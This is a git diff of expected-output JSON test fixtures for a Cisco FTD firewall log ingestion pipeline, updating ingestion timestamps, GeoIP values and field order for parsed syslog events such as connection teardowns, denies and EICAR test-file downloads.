@@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305858800Z", + "ingested": "2021-12-14T14:37:47.267676622Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2871,7 +2871,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305864200Z", + "ingested": "2021-12-14T14:37:47.267676967Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2948,7 +2948,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305869500Z", + "ingested": "2021-12-14T14:37:47.267677314Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3026,7 +3026,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305874900Z", + "ingested": "2021-12-14T14:37:47.267677640Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3106,7 +3106,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305880300Z", + "ingested": "2021-12-14T14:37:47.267677972Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", 
@@ -3188,7 +3188,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305885600Z", + "ingested": "2021-12-14T14:37:47.267678304Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3269,7 +3269,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305890900Z", + "ingested": "2021-12-14T14:37:47.267678641Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3350,7 +3350,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305896300Z", + "ingested": "2021-12-14T14:37:47.267678977Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3423,7 +3423,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305901700Z", + "ingested": "2021-12-14T14:37:47.267679314Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3493,7 +3493,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305907100Z", + "ingested": "2021-12-14T14:37:47.267679646Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", 
@@ -3568,7 +3568,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305912500Z", + "ingested": "2021-12-14T14:37:47.267679976Z", "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3646,7 +3646,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305918Z", + "ingested": "2021-12-14T14:37:47.267680428Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3726,7 +3726,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305923400Z", + "ingested": "2021-12-14T14:37:47.267680762Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3808,7 +3808,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305928800Z", + "ingested": "2021-12-14T14:37:47.267681105Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:33:04.305934100Z", + "ingested": "2021-12-14T14:37:47.267681428Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", 
@@ -3948,7 +3948,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305939400Z", + "ingested": "2021-12-14T14:37:47.267681774Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4012,7 +4012,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305944700Z", + "ingested": "2021-12-14T14:37:47.267682101Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4076,7 +4076,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305950Z", + "ingested": "2021-12-14T14:37:47.267682433Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4140,7 +4140,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305955300Z", + "ingested": "2021-12-14T14:37:47.267682759Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4204,7 +4204,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305960800Z", + "ingested": "2021-12-14T14:37:47.267683158Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4268,7 +4268,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305966100Z", + "ingested": "2021-12-14T14:37:47.267683489Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305971500Z", + "ingested": "2021-12-14T14:37:47.267683817Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305976800Z", + "ingested": "2021-12-14T14:37:47.267684153Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4471,7 +4471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306013300Z", + "ingested": "2021-12-14T14:37:47.267684509Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:04.306019700Z", + "ingested": "2021-12-14T14:37:47.267684842Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306025100Z", + "ingested": "2021-12-14T14:37:47.267685183Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", 
@@ -4680,7 +4680,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306030500Z", + "ingested": "2021-12-14T14:37:47.267685515Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4762,7 +4762,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306039700Z", + "ingested": "2021-12-14T14:37:47.267685841Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4844,7 +4844,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306045100Z", + "ingested": "2021-12-14T14:37:47.267686176Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4908,7 +4908,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.306050700Z", + "ingested": "2021-12-14T14:37:47.267686504Z", "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", 
@@ -4964,7 +4964,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.306056Z", + "ingested": "2021-12-14T14:37:47.267686830Z", "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -5026,7 +5026,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.306061300Z", + "ingested": "2021-12-14T14:37:47.267687164Z", "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json index 52f31f7087c..9252476ce27 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json @@ -16,15 +16,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -62,7 +62,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624161600Z", + "ingested": "2021-12-14T14:37:55.820193450Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -131,15 +131,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:33:12.624169900Z", + "ingested": "2021-12-14T14:37:55.820196341Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", 
@@ -238,37 +238,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "eu-central-1.ec2.archive.ubuntu.com", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "81.2.69.144", - "packets": 0 + "packets": 0, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "eu-central-1.ec2.archive.ubuntu.com", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -277,15 +271,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -323,7 +317,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624175500Z", + "ingested": "2021-12-14T14:37:55.820196817Z", "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", @@ -382,37 +376,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "siem-inside", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "81.2.69.144", - "packets": 2 + "packets": 2, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "siem-inside", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", 
@@ -421,15 +409,15 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -468,7 +456,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:33:12.624180900Z", + "ingested": "2021-12-14T14:37:55.820197194Z", "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", @@ -535,27 +523,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", 
@@ -564,13 +546,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -608,7 +590,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624186200Z", + "ingested": "2021-12-14T14:37:55.820197552Z", "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -666,27 +648,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "81.2.69.144", - "packets": 29001 + "packets": 29001, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -702,9 +678,6 @@ "scheme": "http", "domain": "eu-central-1.ec2.archive.ubuntu.com" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", @@ -714,6 +687,9 @@ ], "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -757,7 +733,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:33:12.624191600Z", + "ingested": "2021-12-14T14:37:55.820197905Z", "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", @@ -829,27 +805,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -858,13 +828,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -902,7 +872,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624240600Z", + "ingested": "2021-12-14T14:37:55.820198293Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -960,27 +930,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -996,15 +960,15 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1048,7 +1012,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:33:12.624248Z", + "ingested": "2021-12-14T14:37:55.820198663Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", @@ -1128,13 +1092,13 @@ "packets": 0, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "1", "transport": "icmp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1172,7 +1136,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624253500Z", + "ingested": "2021-12-14T14:37:55.820199016Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", 
@@ -1252,15 +1216,15 @@ "10.0.100.30:8000" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1304,7 +1268,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:33:12.624259Z", + "ingested": "2021-12-14T14:37:55.820199375Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json index 12dc3d022ad..6f8c8d392e1 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json 
